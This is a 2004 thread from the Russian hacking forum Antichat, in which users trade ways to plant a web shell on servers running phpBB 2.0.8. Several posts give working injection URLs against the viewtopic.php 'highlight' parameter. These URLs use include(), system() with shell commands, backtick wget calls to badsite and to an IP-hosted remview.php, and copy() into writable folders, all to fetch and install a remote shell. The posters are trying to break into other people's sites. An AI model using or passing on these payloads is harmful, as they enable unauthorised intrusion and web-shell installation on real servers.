Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group |

22.12.2004, 00:56
|
|
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме: 0
Репутация:
0
|
|
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group
Люди, подскажите плизз.... буду очень признателен:
вот когда я хочу скатать шелл на сервер, используя:
http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527
мне в ответ пишет:
he html tags you attempted to use are not allowed
[ Go Back ]
Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
|
|
|

24.12.2004, 16:48
|
|
Новичок
Регистрация: 24.12.2004
Сообщений: 2
Провел на форуме: 3851
Репутация:
0
|
|
можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://badsite/shell.php
или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://badsite/shell.php`.%2527
может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)
|
|
|

25.12.2004, 00:42
|
|
Новичок
Регистрация: 07.12.2004
Сообщений: 27
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от onyx3
http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527
Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !
|
|
|

25.12.2004, 06:20
|
|
Новичок
Регистрация: 24.12.2004
Сообщений: 16
Провел на форуме: 110162
Репутация:
7
|
|
а у меня вообще пишет что такой темы нет 
|
|
|

26.12.2004, 00:08
|
|
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме: 0
Репутация:
0
|
|
Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums
И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!
Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
|
|
|

26.12.2004, 21:20
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
поробуй выполнить команды так:
viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=ls -la
|
|
|

27.12.2004, 00:24
|
|
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме: 11532
Репутация:
0
|
|
а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"
и еще,
может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)
ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?
viewtopic.php?a=http://123.123.123.123/remview.php& b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 ???????
типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum
не понятно всё это...
P.S.
ведь drwxrwxrwx - это открытая папка на запись.
Последний раз редактировалось vega2k; 27.12.2004 в 00:38..
|
|
|

27.12.2004, 00:46
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
да не геморься ты, лучше залей обычным wget'ом и потом скопируй...
|
|
|

27.12.2004, 23:59
|
|
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от virgoz
поробуй выполнить команды так:
мне в ответ пишет:
The html tags you attempted to use are not allowed
[ Go Back ]
Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
|
|
|

05.01.2005, 17:06
|
|
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме: 0
Репутация:
0
|
|
Эй ну что кто нибудь встречал такую проблему??
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|